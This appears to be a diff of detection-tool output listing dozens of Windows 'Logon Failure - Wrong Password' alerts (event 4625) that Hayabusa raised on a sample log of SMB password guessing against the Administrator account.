+2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QKcFiKC5QiIoHtxy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sqvq9GwuPCO15lUV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4XzgtJ3qUmkFiIY5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V1wc1Hjb4AK0Np1q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PKYNy0JyxIlFusMC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IrcKp13ut9M0pCi0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B3lJSH0r8iHAVhPF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ju3lCbvbwvkIKsBo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dQOHcZeAKQG6wHhC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QBPkgoKDLABqdSQb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wqj4xOCsJg1j3IIh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XhBIu6wUPHc3DZAy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: W0fI1GhH5YTOHbNN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b7mLOWiojillZNYH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 37dknpwsl8j1WRWi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gzVum7a21sQe3fMt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JCFPSQmywelTXg74  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jCqb6TVV14hVX3NY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3qJsJrxVARedOdd3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s7iNkrkBNEbXPK0B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Bio4zciNRolyeHc1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IFf1vN5MgAIsdZvx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zWhgUQSWAycVdYoS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ugHUJZuKHYfUHXWS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AUeUmYa72BzHfyhK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ksydur7W1mUoOZAE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YNIzopnsXH6OjcUs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SQljJkaWs8bcaOI1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1jejn6ZMo564m7ok  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KrpBO1SCHpt27CRM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ifPePsozBYRLCU3k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vve4r8QwaMLKrrcX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i9ArElR5k8yLefWu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4a1Y126C516BaGcz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VL7PnrO2dLsEbebQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GGTlLZ8J9f2PtiuL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6sVwPFs7bhJgJwRt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dgQNHL9etdHdRw9Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mjZrWpJlN2CwbxFc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 72lmrp6neWGKAURB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CnTi5dgoWunYutJ9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Vi2fTl07llsJEYyt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Hohh8KS1eYtojEya  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RsuC8F95UmsOSKvs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: be8UJ0EN7XS5r0b6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CgJlVYanwWKAhJ7O  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zthqCIkr1nKtqcCj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tzmi8I402j71q5Wg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m0U3NYl8QEbgeJry  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uJJ1FOUIBInGkKPQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bu0X5RisszAHEs0X  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5ZZfs8zqT2bLOAHq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qkpO31LzJfaYLyjB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BJrIsRTWUwPuySR7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VHNccqtwl9Y9IhLq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: APlvDcMzvms0gehT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AxOERGKI75RarVNZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uvzwd5qqC7og49yW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lksm3o2g0YhFnm4Z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zwXhSPCV4qHVF9Rc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: z31baZ4G36idFMeX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WK63qylKunHZB3zS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ALJxKGwyZz7JDpRg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q8tioTO3TEIzdzY0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5dIKTgQkvPKzKJoZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ta0IMrlArbgONhDG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MKNUu4624Rvr87kK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n7jIL2FkXzWqvWTJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oJMVh1zdQt7EikVj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5OqvximSAPlXZ3An  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tr2GQ1F3jccpWrsm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CCmbvQXXXzhHOdMG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
